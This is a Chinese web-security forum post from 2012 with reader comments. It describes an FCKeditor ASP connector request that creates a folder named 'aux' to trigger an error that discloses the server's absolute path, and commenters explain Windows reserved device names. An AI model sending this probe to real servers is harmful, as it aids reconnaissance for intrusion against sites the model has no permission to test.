FCKeditor爆绝对路径

2012-11-19 22:09:19 58 kafeitianshi 5783

代码：FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux

版本未测试。。。

原理：新建个aux文件夹，aux在windows系统不支持，所以会报错，爆出绝对路径，这个比较鸡肋。求大神别喷。。。

类别 Web安全

关于作者

kafeitianshi7篇文章517篇回复

kafeitianshi

评论58次

要评论？请先登录或注册

38楼

kauchang
2012-12-25 14:31

这个可以一用

回复|@ta|踩(0)|顶(0)
37楼

但丁
2012-12-22 18:32

先收藏，必要的时候拿出来用~

回复|@ta|踩(0)|顶(0)
36楼

洪流
2012-12-22 17:20

收藏了，很不错的方法

回复|@ta|踩(0)|顶(0)
35楼

ahkxhyl
2012-12-22 11:17

先收之，等要的时候再拿出来！！

回复|@ta|踩(0)|顶(0)
34楼

shell2us
2012-12-21 10:09

收藏了，又多一条技巧，谢谢了

回复|@ta|踩(0)|顶(0)
33楼

icc
2012-12-21 00:55

上次不是传国外大黑客发现fck的高危漏洞了么？细节呢？

回复|@ta|踩(0)|顶(0)
32楼

lostinunasm
2012-12-15 23:01

用特殊文件名的方式，的确可以啊。

回复|@ta|踩(0)|顶(0)
31楼

perefcct99
2012-12-11 19:24

拿了。。。

回复|@ta|踩(0)|顶(0)
30楼

maxs98
2012-12-11 01:05

2.8.0测试无效

回复|@ta|踩(0)|顶(0)
29楼

csser
2012-12-9 22:11

方法带走了，有时候可能会用上

回复|@ta|踩(0)|顶(0)
28楼

xiaoxu
2012-12-9 21:39

支持一下~~~~~~~~~

回复|@ta|踩(0)|顶(0)
27楼

xiaoxiaoabc
2012-12-9 19:55

回复|@ta|踩(0)|顶(0)
26楼

fengxin
2012-12-9 16:54

这个不错啊!!!!!!

回复|@ta|踩(0)|顶(0)
25楼

uedbox
2012-12-8 22:04

上周看到了，基于版本限制，还没测试，碰到的都是PHP的。

回复|@ta|踩(0)|顶(0)
24楼

wyfiwqc
2012-12-8 16:39

收集情报有用

回复|@ta|踩(0)|顶(0)
23楼

YinRSeven
2012-12-3 15:11

看看啊~~好东西

回复|@ta|踩(0)|顶(0)
22楼

xiaoa1314
2012-12-3 13:40

我还没测试过先顶顶

回复|@ta|踩(0)|顶(0)
21楼

samurai
2012-12-2 11:22

原理：Windows 下不能够以下面这些字样来命名文件/文件夹，包括：“aux”“com1”“com2”“prn”“con”和“nul”等，因为这些名字都属于设备名称，等价于一个 DOS 设备，如果我们把文件命名为这些名字，Windows 就会误以为发生重名，所以会提示“不能创建同名的文件”等等。

回复|@ta|踩(0)|顶(0)
20楼

biying
2012-11-27 16:12

收藏了好方法

回复|@ta|踩(0)|顶(0)
19楼

jk影
2012-11-27 15:42

linux下有测试过过吗？

回复|@ta|踩(0)|顶(0)